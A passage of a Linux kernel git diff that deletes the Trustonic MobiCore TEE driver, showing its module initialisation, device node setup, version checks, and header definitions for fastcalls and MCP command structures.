--		return ret;
--	}
--	return 0;
--}
--
--static inline int device_user_init(void)
--{
--	int ret = 0;
--	struct device *dev;
--
--	mc_dev_user = MKDEV(MAJOR(mc_dev_admin), 1);
--	/* Create the user node */
--	ret = cdev_add(&mc_user_cdev, mc_dev_user, 1);
--	if (ret) {
--		MCDRV_ERROR("user device register failed");
--		goto err_cdev_add;
--	}
--	mc_user_cdev.owner = THIS_MODULE;
--	dev = device_create(mc_device_class, NULL, mc_dev_user, NULL,
--			    MC_USER_DEVNODE);
--	if (IS_ERR(dev)) {
--		ret = PTR_ERR(dev);
--		goto err_device_create;
--	}
--
--	/* Create debugfs info entry */
--	debugfs_create_file("info", 0400, g_ctx.debug_dir, NULL,
--			    &mc_debug_info_ops);
--
--	return 0;
--
--err_device_create:
--	cdev_del(&mc_user_cdev);
--err_cdev_add:
--	mc_admin_exit(mc_device_class);
--	class_destroy(mc_device_class);
--	MCDRV_DBG("failed with %d", ret);
--	return ret;
--}
--
--static void devices_exit(void)
--{
--	device_destroy(mc_device_class, mc_dev_user);
--	cdev_del(&mc_user_cdev);
--	mc_admin_exit(mc_device_class);
--	class_destroy(mc_device_class);
--}
--
--static inline int mobicore_start(void)
--{
--	int ret;
--	struct mc_version_info version_info;
--
--	ret = mcp_start();
--	if (ret) {
--		MCDRV_ERROR("TEE start failed");
--		goto err_mcp;
--	}
--
--	ret = mc_logging_start();
--	if (ret) {
--		MCDRV_ERROR("Log start failed");
--		goto err_log;
--	}
--
--	ret = mc_scheduler_start();
--	if (ret) {
--		MCDRV_ERROR("Scheduler start failed");
--		goto err_sched;
--	}
--
--	ret = mc_pm_start();
--	if (ret) {
--		MCDRV_ERROR("Power Management start failed");
--		goto err_pm;
--	}
--
--	ret = mcp_get_version(&version_info);
--	if (ret)
--		goto err_mcp_cmd;
--
--	MCDRV_DBG("\n"
--		  "    product_id        = %s\n"
--		  "    version_so        = 0x%x\n"
--		  "    version_mci       = 0x%x\n"
--		  "    version_mclf      = 0x%x\n"
--		  "    version_container = 0x%x\n"
--		  "    version_mc_config = 0x%x\n"
--		  "    version_tl_api    = 0x%x\n"
--		  "    version_dr_api    = 0x%x\n"
--		  "    version_cmp       = 0x%x\n",
--		  version_info.product_id,
--		  version_info.version_mci,
--		  version_info.version_so,
--		  version_info.version_mclf,
--		  version_info.version_container,
--		  version_info.version_mc_config,
--		  version_info.version_tl_api,
--		  version_info.version_dr_api,
--		  version_info.version_cmp);
--
--	if (MC_VERSION_MAJOR(version_info.version_mci) > 1) {
--		pr_err("MCI version %d.%d is too recent for this driver",
--		       MC_VERSION_MAJOR(version_info.version_mci),
--		       MC_VERSION_MINOR(version_info.version_mci));
--		goto err_version;
--	}
--
--	if ((MC_VERSION_MAJOR(version_info.version_mci) == 0) &&
--	    (MC_VERSION_MINOR(version_info.version_mci) < 6)) {
--		pr_err("MCI version %d.%d is too old for this driver",
--		       MC_VERSION_MAJOR(version_info.version_mci),
--		       MC_VERSION_MINOR(version_info.version_mci));
--		goto err_version;
--	}
--
--	dev_info(g_ctx.mcd, "MobiCore MCI version is %d.%d\n",
--		 MC_VERSION_MAJOR(version_info.version_mci),
--		 MC_VERSION_MINOR(version_info.version_mci));
--
--	/* Determine which features are supported */
--	switch (version_info.version_mci) {
--	case MC_VERSION(1, 2):	/* 310 */
--		g_ctx.f_client_login = true;
--		/* Fall through */
--	case MC_VERSION(1, 1):
--		g_ctx.f_multimap = true;
--		/* Fall through */
--	case MC_VERSION(1, 0):	/* 302 */
--		g_ctx.f_mem_ext = true;
--		g_ctx.f_ta_auth = true;
--		/* Fall through */
--	case MC_VERSION(0, 7):
--		g_ctx.f_timeout = true;
--		/* Fall through */
--	case MC_VERSION(0, 6):	/* 301 */
--		break;
--	}
--
--	ret = device_user_init();
--	if (ret)
--		goto err_create_dev_user;
--
--	return 0;
--
--err_create_dev_user:
--err_version:
--err_mcp_cmd:
--	mc_pm_stop();
--err_pm:
--	mc_scheduler_stop();
--err_sched:
--	mc_logging_stop();
--err_log:
--	mcp_stop();
--err_mcp:
--	return ret;
--}
--
--static inline void mobicore_stop(void)
--{
--	mc_pm_stop();
--	mc_scheduler_stop();
--	mc_logging_stop();
--	mcp_stop();
--}
--
--/*
-- * This function is called by the kernel during startup or by a insmod command.
-- * This device is installed and registered as cdev, then interrupt and
-- * queue handling is set up
-- */
--static int mobicore_init(void)
--{
--	int err = 0;
--
--	dev_set_name(g_ctx.mcd, "TEE");
--
--	/* Do not remove or change the following trace.
--	 * The string "MobiCore" is used to detect if <t-base is in of the image
--	 */
--	dev_info(g_ctx.mcd, "MobiCore mcDrvModuleApi version is %d.%d\n",
--		 MCDRVMODULEAPI_VERSION_MAJOR, MCDRVMODULEAPI_VERSION_MINOR);
--#ifdef MOBICORE_COMPONENT_BUILD_TAG
--	dev_info(g_ctx.mcd, "MobiCore %s\n", MOBICORE_COMPONENT_BUILD_TAG);
--#endif
--	/* Hardware does not support ARM TrustZone -> Cannot continue! */
--	if (!has_security_extensions()) {
--		MCDRV_ERROR("Hardware doesn't support ARM TrustZone!");
--		return -ENODEV;
--	}
--
--	/* Running in secure mode -> Cannot load the driver! */
--	if (is_secure_mode()) {
--		MCDRV_ERROR("Running in secure MODE!");
--		return -ENODEV;
--	}
--
--	/* Init common API layer */
--	api_init();
--
--	/* Init plenty of nice features */
--	err = mc_fastcall_init();
--	if (err) {
--		MCDRV_ERROR("Fastcall support init failed!");
--		goto fail_fastcall_init;
--	}
--
--	err = mcp_init();
--	if (err) {
--		MCDRV_ERROR("MCP init failed!");
--		goto fail_mcp_init;
--	}
--
--	err = mc_logging_init();
--	if (err) {
--		MCDRV_ERROR("Log init failed!");
--		goto fail_log_init;
--	}
--
--	/* The scheduler is the first to create a debugfs entry */
--	g_ctx.debug_dir = debugfs_create_dir("trustonic_tee", NULL);
--	err = mc_scheduler_init();
--	if (err) {
--		MCDRV_ERROR("Scheduler init failed!");
--		goto fail_mc_device_sched_init;
--	}
--
--	/*
--	* Create admin dev so that daemon can already communicate with
--	* the driver
--	*/
--	err = device_admin_init(mobicore_start);
--	if (err)
--		goto fail_creat_dev_admin;
--
--		return 0;
--
--fail_creat_dev_admin:
--	mc_scheduler_exit();
--fail_mc_device_sched_init:
--	debugfs_remove(g_ctx.debug_dir);
--	mc_logging_exit();
--fail_log_init:
--	mcp_exit();
--fail_mcp_init:
--	mc_fastcall_exit();
--fail_fastcall_init:
--	return err;
--}
--
--/*
-- * This function removes this device driver from the Linux device manager .
-- */
--static void mobicore_exit(void)
--{
--	MCDRV_DBG("enter");
--
--	devices_exit();
--	mobicore_stop();
--	mc_scheduler_exit();
--	mc_logging_exit();
--	mcp_exit();
--	mc_fastcall_exit();
--	debugfs_remove_recursive(g_ctx.debug_dir);
--
--	MCDRV_DBG("exit");
--}
--
--/* Linux Driver Module Macros */
--
--#ifdef MC_DEVICE_PROPNAME
--
--static int mobicore_probe(struct platform_device *pdev)
--{
--	g_ctx.mcd->of_node = pdev->dev.of_node;
--	mobicore_init();
--	return 0;
--}
--
--static const struct of_device_id of_match_table[] = {
--	{ .compatible = MC_DEVICE_PROPNAME },
--	{ }
--};
--
--static struct platform_driver mc_plat_driver = {
--	.probe = mobicore_probe,
--	.driver = {
--		.name = "mcd",
--		.owner = THIS_MODULE,
--		.of_match_table = of_match_table,
--	}
--};
--
--static int mobicore_register(void)
--{
--	return platform_driver_register(&mc_plat_driver);
--}
--
--static void mobicore_unregister(void)
--{
--	platform_driver_unregister(&mc_plat_driver);
--	mobicore_exit();
--}
--
--module_init(mobicore_register);
--module_exit(mobicore_unregister);
--
--#else /* MC_DEVICE_PROPNAME */
--
--module_init(mobicore_init);
--module_exit(mobicore_exit);
--
--#endif /* !MC_DEVICE_PROPNAME */
--
--MODULE_AUTHOR("Trustonic Limited");
--MODULE_LICENSE("GPL v2");
--MODULE_DESCRIPTION("MobiCore driver");
-diff --git a/drivers/gud/MobiCoreDriver/main.h b/drivers/gud/MobiCoreDriver/main.h
-deleted file mode 100644
-index cadc3d766147a..0000000000000
---- a/drivers/gud/MobiCoreDriver/main.h
-+++ /dev/null
-@@ -1,60 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _MC_MAIN_H_
--#define _MC_MAIN_H_
--
--#include <linux/slab.h>		/* gfp_t */
--
--#define MC_VERSION(major, minor) \
--		(((major & 0x0000ffff) << 16) | (minor & 0x0000ffff))
--#define MC_VERSION_MAJOR(x) ((x) >> 16)
--#define MC_VERSION_MINOR(x) ((x) & 0xffff)
--
--/* MobiCore Driver Kernel Module context data. */
--struct mc_device_ctx {
--	struct device		*mcd;
--	/* debugfs root */
--	struct dentry		*debug_dir;
--
--	/* GP sessions waiting final close notif */
--	struct list_head	closing_sess;
--	struct mutex		closing_lock; /* Closing sessions list */
--
--	/* Features */
--	/* - SWd can set a time out to get scheduled at a future time */
--	bool			f_timeout;
--	/* - SWd supports memory extension which allows for bigger TAs */
--	bool			f_mem_ext;
--	/* - SWd supports TA authorisation */
--	bool			f_ta_auth;
--	/* - SWd can map several buffers at once */
--	bool			f_multimap;
--	/* - SWd supports GP client authentication */
--	bool			f_client_login;
--};
--
--extern struct mc_device_ctx g_ctx;
--
--struct kasnprintf_buf {
--	gfp_t gfp;
--	void *buf;
--	int size;
--	int off;
--};
--
--extern __printf(2, 3)
--int kasnprintf(struct kasnprintf_buf *buf, const char *fmt, ...);
--
--#endif /* _MC_MAIN_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/mci/mcifc.h b/drivers/gud/MobiCoreDriver/mci/mcifc.h
-deleted file mode 100644
-index 4848c9e047fba..0000000000000
---- a/drivers/gud/MobiCoreDriver/mci/mcifc.h
-+++ /dev/null
-@@ -1,144 +0,0 @@
--/*
-- * Copyright (c) 2013-2014 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#ifndef MCIFC_H_
--#define MCIFC_H_
--
--#include "platform.h"
--
--/** @name MobiCore FastCall Defines
-- * Defines for the two different FastCall's.
-- */
--/** @{ */
--
--#include "platform.h"
--
--/* --- global ---- */
--#define MC_FC_INVALID	((uint32_t)0)  /**< Invalid FastCall ID */
--
--#if defined(CONFIG_ARM64) && !defined(MC_ARMV7_FC)
--
--/* These should be handled as 64-bit FCs; now they are more like 32bits... */
--#define MC_FC_STD64_BASE	((uint32_t)0xFF000000)
--#define MC_FC_STD64(x)	((uint32_t)(MC_FC_STD64_BASE + (x)))
--
--#define MC_FC_INIT	MC_FC_STD64(1)  /**< Initializing FastCall. */
--#define MC_FC_INFO	MC_FC_STD64(2)  /**< Info FastCall. */
--#define MC_FC_MEM_TRACE	MC_FC_STD64(10)  /**< Enable SWd tracing via memory */
--#define MC_FC_SWAP_CPU	MC_FC_STD64(54)  /**< Change new active Core */
--
--#else
--
--#define MC_FC_INIT	((uint32_t)(-1))  /**< Initializing FastCall. */
--#define MC_FC_INFO	((uint32_t)(-2))  /**< Info FastCall. */
--#define MC_FC_MEM_TRACE	((uint32_t)(-31))  /**< Enable SWd tracing via memory */
--#define MC_FC_SWAP_CPU	((uint32_t)(0x84000005))  /**< Change new active Core */
--
--#endif
--
--/** @} */
--
--/** @name MobiCore SMC Defines
-- * Defines the different secure monitor calls (SMC) for world switching.
-- * @{ */
--/**< Yield to switch from NWd to SWd. */
--#define MC_SMC_N_YIELD			3
--/**< SIQ to switch from NWd to SWd. */
--#define MC_SMC_N_SIQ			4
--/** @} */
--
--/** @name MobiCore status
-- *  MobiCore status information.
-- * @{ */
--/**< MobiCore is not yet initialized. FastCall FcInit() to set up MobiCore.*/
--#define MC_STATUS_NOT_INITIALIZED	0
--/**< Bad parameters have been passed in FcInit(). */
--#define MC_STATUS_BAD_INIT		1
--/**< MobiCore did initialize properly. */
--#define MC_STATUS_INITIALIZED		2
--/**< MobiCore kernel halted due to an unrecoverable exception. Further
-- * information is available extended info */
--#define MC_STATUS_HALT			3
--/** @} */
--
--/** @name Extended Info Identifiers
-- *  Extended info parameters for MC_FC_INFO to obtain further information depending on MobiCore state.
-- * @{ */
--/**< Version of the MobiCore Control Interface (MCI) */
--#define MC_EXT_INFO_ID_MCI_VERSION	0
--/**< MobiCore control flags */
--#define MC_EXT_INFO_ID_FLAGS		1
--/**< MobiCore halt condition code */
--#define MC_EXT_INFO_ID_HALT_CODE	2
--/**< MobiCore halt condition instruction pointer */
--#define MC_EXT_INFO_ID_HALT_IP		3
--/**< MobiCore fault counter */
--#define MC_EXT_INFO_ID_FAULT_CNT	4
--/**< MobiCore last fault cause */
--#define MC_EXT_INFO_ID_FAULT_CAUSE	5
--/**< MobiCore last fault meta */
--#define MC_EXT_INFO_ID_FAULT_META	6
--/**< MobiCore last fault threadid */
--#define MC_EXT_INFO_ID_FAULT_THREAD	7
--/**< MobiCore last fault instruction pointer */
--#define MC_EXT_INFO_ID_FAULT_IP		8
--/**< MobiCore last fault stack pointer */
--#define MC_EXT_INFO_ID_FAULT_SP		9
--/**< MobiCore last fault ARM arch information */
--#define MC_EXT_INFO_ID_FAULT_ARCH_DFSR	10
--/**< MobiCore last fault ARM arch information */
--#define MC_EXT_INFO_ID_FAULT_ARCH_ADFSR	11
--/**< MobiCore last fault ARM arch information */
--#define MC_EXT_INFO_ID_FAULT_ARCH_DFAR	12
--/**< MobiCore last fault ARM arch information */
--#define MC_EXT_INFO_ID_FAULT_ARCH_IFSR	13
--/**< MobiCore last fault ARM arch information */
--#define MC_EXT_INFO_ID_FAULT_ARCH_AIFSR	14
--/**< MobiCore last fault ARM arch information */
--#define MC_EXT_INFO_ID_FAULT_ARCH_IFAR	15
--/**< MobiCore configured by Daemon via fc_init flag */
--#define MC_EXT_INFO_ID_MC_CONFIGURED	16
--/**< MobiCore scheduling status: idle/non-idle */
--#define MC_EXT_INFO_ID_MC_SCHED_STATUS	17
--/**< MobiCore runtime status: initialized, halted */
--#define MC_EXT_INFO_ID_MC_STATUS	18
--/**< MobiCore exception handler last partner */
--#define MC_EXT_INFO_ID_MC_EXC_PARTNER	19
--/**< MobiCore exception handler last peer */
--#define MC_EXT_INFO_ID_MC_EXC_IPCPEER	20
--/**< MobiCore exception handler last IPC message */
--#define MC_EXT_INFO_ID_MC_EXC_IPCMSG	21
--/**< MobiCore exception handler last IPC data */
--#define MC_EXT_INFO_ID_MC_EXC_IPCDATA	22
--/**< MobiCore exception handler last UUID (uses 4 slots: 23 to 26) */
--#define MC_EXT_INFO_ID_MC_EXC_UUID	23
--#define MC_EXT_INFO_ID_MC_EXC_UUID1	24
--#define MC_EXT_INFO_ID_MC_EXC_UUID2	25
--#define MC_EXT_INFO_ID_MC_EXC_UUID3	26
--
--/** @} */
--
--/** @name FastCall return values
-- * Return values of the MobiCore FastCalls.
-- * @{ */
--/**< No error. Everything worked fine. */
--#define MC_FC_RET_OK				0
--/**< FastCall was not successful. */
--#define MC_FC_RET_ERR_INVALID			1
--/**< MobiCore has already been initialized. */
--#define MC_FC_RET_ERR_ALREADY_INITIALIZED	5
--/** @} */
--
--#endif /** MCIFC_H_ */
--
--/** @} */
-diff --git a/drivers/gud/MobiCoreDriver/mci/mcimcp.h b/drivers/gud/MobiCoreDriver/mci/mcimcp.h
-deleted file mode 100644
-index 3eb2efea2c30c..0000000000000
---- a/drivers/gud/MobiCoreDriver/mci/mcimcp.h
-+++ /dev/null
-@@ -1,508 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef MCP_H_
--#define MCP_H_
--
--#include "mci/mcloadformat.h"
--
--/** Indicates a response */
--#define FLAG_RESPONSE       BIT(31)
--
--/** Maximum number of buffers that can be mapped at once */
--#define MCP_MAP_MAX_BUF        4
--
--/** MobiCore Return Code Defines.
-- * List of the possible MobiCore return codes.
-- */
--enum mcp_result {
--	/** Memory has successfully been mapped */
--	MC_MCP_RET_OK                                   =  0,
--	/** The session ID is invalid */
--	MC_MCP_RET_ERR_INVALID_SESSION                  =  1,
--	/** The UUID of the Trustlet is unknown */
--	MC_MCP_RET_ERR_UNKNOWN_UUID                     =  2,
--	/** The ID of the driver is unknown */
--	MC_MCP_RET_ERR_UNKNOWN_DRIVER_ID                =  3,
--	/** No more session are allowed */
--	MC_MCP_RET_ERR_NO_MORE_SESSIONS                 =  4,
--	/** The container is invalid */
--	MC_MCP_RET_ERR_CONTAINER_INVALID                =  5,
--	/** The Trustlet is invalid */
--	MC_MCP_RET_ERR_TRUSTLET_INVALID                 =  6,
--	/** The memory block has already been mapped before */
--	MC_MCP_RET_ERR_ALREADY_MAPPED                   =  7,
--	/** Alignment or length error in the command parameters */
--	MC_MCP_RET_ERR_INVALID_PARAM                    =  8,
--	/** No space left in the virtual address space of the session */
--	MC_MCP_RET_ERR_OUT_OF_RESOURCES                 =  9,
--	/** WSM type unknown or broken WSM */
--	MC_MCP_RET_ERR_INVALID_WSM                      = 10,
--	/** unknown error */
--	MC_MCP_RET_ERR_UNKNOWN                          = 11,
--	/** Length of map invalid */
--	MC_MCP_RET_ERR_INVALID_MAPPING_LENGTH           = 12,
--	/** Map can only be applied to Trustlet session */
--	MC_MCP_RET_ERR_MAPPING_TARGET                   = 13,
--	/** Couldn't open crypto session */
--	MC_MCP_RET_ERR_OUT_OF_CRYPTO_RESOURCES          = 14,
--	/** System Trustlet signature verification failed */
--	MC_MCP_RET_ERR_SIGNATURE_VERIFICATION_FAILED    = 15,
--	/** System Trustlet public key is wrong */
--	MC_MCP_RET_ERR_WRONG_PUBLIC_KEY                 = 16,
--	/** Wrong containter type(s) */
--	MC_MCP_RET_ERR_CONTAINER_TYPE_MISMATCH          = 17,
--	/** Container is locked (or not activated) */
--	MC_MCP_RET_ERR_CONTAINER_LOCKED                 = 18,
--	/** SPID is not registered with root container */
--	MC_MCP_RET_ERR_SP_NO_CHILD                      = 19,
--	/** UUID is not registered with sp container */
--	MC_MCP_RET_ERR_TL_NO_CHILD                      = 20,
--	/** Unwrapping of root container failed */
--	MC_MCP_RET_ERR_UNWRAP_ROOT_FAILED               = 21,
--	/** Unwrapping of service provider container failed */
--	MC_MCP_RET_ERR_UNWRAP_SP_FAILED                 = 22,
--	/** Unwrapping of Trustlet container failed */
--	MC_MCP_RET_ERR_UNWRAP_TRUSTLET_FAILED           = 23,
--	/** Container version mismatch */
--	MC_MCP_RET_ERR_CONTAINER_VERSION_MISMATCH       = 24,
--	/** Decryption of service provider trustlet failed */
--	MC_MCP_RET_ERR_SP_TL_DECRYPTION_FAILED          = 25,
--	/** Hash check of service provider trustlet failed */
--	MC_MCP_RET_ERR_SP_TL_HASH_CHECK_FAILED          = 26,
--	/** Activation/starting of task failed */
--	MC_MCP_RET_ERR_LAUNCH_TASK_FAILED               = 27,
--	/** Closing of task not yet possible, try again later */
--	MC_MCP_RET_ERR_CLOSE_TASK_FAILED                = 28,
--	/**< Service is blocked and a session cannot be opened to it */
--	MC_MCP_RET_ERR_SERVICE_BLOCKED                  = 29,
--	/**< Service is locked and a session cannot be opened to it */
--	MC_MCP_RET_ERR_SERVICE_LOCKED                   = 30,
--	/**< Service was forcefully killed (due to an administrative command) */
--	MC_MCP_RET_ERR_SERVICE_KILLED                   = 31,
--	/** The command is unknown */
--	MC_MCP_RET_ERR_UNKNOWN_COMMAND                  = 50,
--	/** The command data is invalid */
--	MC_MCP_RET_ERR_INVALID_DATA                     = 51
--};
--
--/** Possible MCP Command IDs
-- * Command ID must be between 0 and 0x7FFFFFFF.
-- */
--enum cmd_id {
--	/** Invalid command ID */
--	MC_MCP_CMD_ID_INVALID		= 0x00,
--	/** Open a session */
--	MC_MCP_CMD_OPEN_SESSION		= 0x01,
--	/** Close an existing session */
--	MC_MCP_CMD_CLOSE_SESSION	= 0x03,
--	/** Map WSM to session */
--	MC_MCP_CMD_MAP			= 0x04,
--	/** Unmap WSM from session */
--	MC_MCP_CMD_UNMAP		= 0x05,
--	/** Prepare for suspend */
--	MC_MCP_CMD_SUSPEND		= 0x06,
--	/** Resume from suspension */
--	MC_MCP_CMD_RESUME		= 0x07,
--	/** Get MobiCore version information */
--	MC_MCP_CMD_GET_MOBICORE_VERSION	= 0x09,
--	/** Close MCP and unmap MCI */
--	MC_MCP_CMD_CLOSE_MCP		= 0x0A,
--	/** Load token for device attestation */
--	MC_MCP_CMD_LOAD_TOKEN		= 0x0B,
--	/** Check that TA can be loaded */
--	MC_MCP_CMD_CHECK_LOAD_TA	= 0x0C,
--	/** Map multiple WSMs to session */
--	MC_MCP_CMD_MULTIMAP		= 0x0D,
--	/** Unmap multiple WSMs to session */
--	MC_MCP_CMD_MULTIUNMAP		= 0x0E,
--};
--
--/*
-- * Types of WSM known to the MobiCore.
-- */
--#define WSM_TYPE_MASK		0xFF
--#define WSM_INVALID		0	/** Invalid memory type */
--#define WSM_L2			2	/** Buffer mapping uses L2/L3 table */
--#define WSM_L1			3	/** Buffer mapping uses fake L1 table */
--
--/** Magic number used to identify if Open Command supports GP client
-- * authentication.
-- */
--#define MC_GP_CLIENT_AUTH_MAGIC	0x47504131	/* "GPA1" */
--
--/** Command header.
-- * It just contains the command ID. Only values specified in cmd_id are
-- * allowed as command IDs.  If the command ID is unspecified the MobiCore
-- * returns an empty response with the result set to
-- * MC_MCP_RET_ERR_UNKNOWN_COMMAND.
-- */
--struct cmd_header {
--	enum cmd_id	cmd_id;	/** Command ID of the command */
--};
--
--/** Response header.
-- * MobiCore will reply to every MCP command with an MCP response.  Like the MCP
-- * command the response consists of a header followed by response data. The
-- * response is written to the same memory location as the MCP command.
-- */
--struct rsp_header {
--	uint32_t	rsp_id;	/** Command ID | FLAG_RESPONSE */
--	enum mcp_result	result;		/** Result of the command execution */
--};
--
--/** @defgroup CMD MCP Commands
-- */
--
--/** @defgroup ASMCMD Administrative Commands
-- */
--
--/** @defgroup MCPGETMOBICOREVERSION GET_MOBICORE_VERSION
-- * Get MobiCore version info.
-- *
-- */
--
--/** Get MobiCore Version Command */
--struct cmd_get_version {
--	struct cmd_header	cmd_header;	/** Command header */
--};
--
--/** Get MobiCore Version Command Response */
--struct rsp_get_version {
--	struct rsp_header	rsp_header;	/** Response header */
--	struct mc_version_info version_info;	/** MobiCore version info */
--};
--
--/** @defgroup POWERCMD Power Management Commands
-- */
--
--/** @defgroup MCPSUSPEND SUSPEND
-- * Prepare MobiCore suspension.
-- * This command allows MobiCore and MobiCore drivers to release or clean
-- * resources and save device state.
-- *
-- */
--
--/** Suspend Command */
--struct cmd_suspend {
--	struct cmd_header	cmd_header;	/** Command header */
--};
--
--/** Suspend Command Response */
--struct rsp_suspend {
--	struct rsp_header	rsp_header;	/** Response header */
--};
--
--/** @defgroup MCPRESUME RESUME
-- * Resume MobiCore from suspension.
-- * This command allows MobiCore and MobiCore drivers to reinitialize hardware
-- * affected by suspension.
-- *
-- */
--
--/** Resume Command */
--struct cmd_resume {
--	struct cmd_header	cmd_header;	/** Command header */
--};
--
--/** Resume Command Response */
--struct rsp_resume {
--	struct rsp_header	rsp_header;	/** Response header */
--};
--
--/** @defgroup SESSCMD Session Management Commands
-- */
--
--/** @defgroup MCPOPEN OPEN
-- * Load and open a session to a Trustlet.
-- * The OPEN command loads Trustlet data to the MobiCore context and opens a
-- * session to the Trustlet.  If wsm_data_type is WSM_INVALID MobiCore tries to
-- * start a pre-installed Trustlet associated with the uuid passed.  The uuid
-- * passed must match the uuid contained in the load data (if available).
-- * On success, MobiCore returns the session ID which can be used for further
-- * communication.
-- */
--
--/** GP client authentication data */
--struct cmd_open_data {
--	uint32_t	mclf_magic;	/** ASCII "MCLF" on older versions */
--	struct identity	identity;	/** Login method and data */
--};
--
--/** Open Command */
--struct cmd_open {
--	struct cmd_header cmd_header;	/** Command header */
--	struct mc_uuid_t uuid;		/** Service UUID */
--	uint8_t		unused[4];	/** Padding to be 64-bit aligned */
--	uint64_t	adr_tci_buffer;	/** Physical address of the TCI MMU */
--	uint64_t	adr_load_data;	/** Physical address of the data MMU */
--	uint32_t	ofs_tci_buffer;	/** Offset to the data */
--	uint32_t	len_tci_buffer;	/** Length of the TCI */
--	uint32_t	wsmtype_tci;	/** Type of WSM used for the TCI */
--	uint32_t	wsm_data_type;	/** Type of MMU */
--	uint32_t	ofs_load_data;	/** Offset to the data */
--	uint32_t	len_load_data;	/** Length of the data to load */
--	union {
--		struct cmd_open_data	cmd_open_data;	/** Client login data */
--		union mclf_header	tl_header;	/** Service header */
--	};
--	uint32_t	is_gpta;	/** true if looking for an SD/GP-TA */
--};
--
--/** Open Command Response */
--struct rsp_open {
--	struct rsp_header	rsp_header;	/** Response header */
--	uint32_t	session_id;	/** Session ID */
--};
--
--/** TA Load Check Command */
--struct cmd_check_load {
--	struct cmd_header cmd_header;	/** Command header */
--	struct mc_uuid_t uuid;		/** Service UUID */
--	uint64_t	adr_load_data;	/** Physical address of the data */
--	uint32_t	wsm_data_type;	/** Type of MMU */
--	uint32_t	ofs_load_data;	/** Offset to the data */
--	uint32_t	len_load_data;	/** Length of the data to load */
--	union mclf_header tl_header;	/** Service header */
--};
--
--/** TA Load Check Response */
--struct rsp_check_load {
--	struct rsp_header	rsp_header;	/** Response header */
--};
--
--/** @defgroup MCPCLOSE CLOSE
-- * Close an existing session to a Trustlet.
-- * The CLOSE command terminates a session and frees all resources in the
-- * MobiCore system which are currently occupied by the session. Before closing
-- * the session, the MobiCore runtime management waits until all pending
-- * operations, like calls to drivers, invoked by the Trustlet have been
-- * terminated.  Mapped memory will automatically be unmapped from the MobiCore
-- * context. The NWd is responsible for processing the freed memory according to
-- * the Rich-OS needs.
-- *
-- */
--
--/** Close Command */
--struct cmd_close {
--	struct cmd_header	cmd_header;	/** Command header */
--	uint32_t		session_id;	/** Session ID */
--};
--
--/** Close Command Response */
--struct rsp_close {
--	struct rsp_header	rsp_header;	/** Response header */
--};
--
--/** @defgroup MCPMAP MAP
-- * Map a portion of memory to a session.
-- * The MAP command provides a block of memory to the context of a service.
-- * The memory then becomes world-shared memory (WSM).
-- * The only allowed memory type here is WSM_L2.
-- */
--
--/** Map Command */
--struct cmd_map {
--	struct cmd_header cmd_header;	/** Command header */
--	uint32_t	session_id;	/** Session ID */
--	uint32_t	wsm_type;	/** Type of MMU */
--	uint32_t	ofs_buffer;	/** Offset to the payload */
--	uint64_t	adr_buffer;	/** Physical address of the MMU */
--	uint32_t	len_buffer;	/** Length of the buffer */
--};
--
--#define MCP_MAP_MAX         0x100000    /** Maximum length for MCP map */
--
--/** Map Command Response */
--struct rsp_map {
--	struct rsp_header	rsp_header;	/** Response header */
--	/** Virtual address the WSM is mapped to, may include an offset! */
--	uint32_t		secure_va;
--};
--
--/** @defgroup MCPUNMAP UNMAP
-- * Unmap a portion of world-shared memory from a session.
-- * The UNMAP command is used to unmap a previously mapped block of
-- * world shared memory from the context of a session.
-- *
-- * Attention: The memory block will be immediately unmapped from the specified
-- * session.  If the service is still accessing the memory, the service will
-- * trigger a segmentation fault.
-- */
--
--/** Unmap Command */
--struct cmd_unmap {
--	struct cmd_header cmd_header;	/** Command header */
--	uint32_t	session_id;	/** Session ID */
--	uint32_t	wsm_type;	/** Type of WSM used of the memory */
--	/** Virtual address the WSM is mapped to, may include an offset! */
--	uint32_t	secure_va;
--	uint32_t	virtual_buffer_len;  /** Length of virtual buffer */
--};
--
--/** Unmap Command Response */
--struct rsp_unmap {
--	struct rsp_header	rsp_header;	/** Response header */
--};
--
--/** @defgroup MCPLOADTOKEN
-- * Load a token from the normal world and share it with <t-base
-- * If something fails, the device attestation functionality will be disabled
-- */
--
--/** Load Token */
--struct cmd_load_token {
--	struct cmd_header cmd_header;	/** Command header */
--	uint32_t	wsm_data_type;	/** Type of MMU */
--	uint64_t	adr_load_data;	/** Physical address of the MMU */
--	uint64_t	ofs_load_data;	/** Offset to the data */
--	uint64_t	len_load_data;	/** Length of the data */
--};
--
--/** Load Token Command Response */
--struct rsp_load_token {
--	struct rsp_header	rsp_header;	/** Response header */
--};
--
--/** @defgroup MCPMULTIMAP MULTIMAP
-- * Map up to MCP_MAP_MAX_BUF portions of memory to a session.
-- * The MULTIMAP command provides MCP_MAP_MAX_BUF blocks of memory to the context
-- * of a service.
-- * The memory then becomes world-shared memory (WSM).
-- * The only allowed memory type here is WSM_L2.
-- * @{ */
--
--/** NWd physical buffer description
-- *
-- * Note: Information is coming from NWd kernel. So it should not be trusted
-- * more than NWd kernel is trusted.
-- */
--struct buffer_map {
--	uint64_t		adr_buffer;	/**< Physical address */
--	uint32_t		ofs_buffer;	/**< Offset of buffer */
--	uint32_t		len_buffer;	/**< Length of buffer */
--	uint32_t		wsm_type;	/**< Type of address */
--};
--
--/** MultiMap Command */
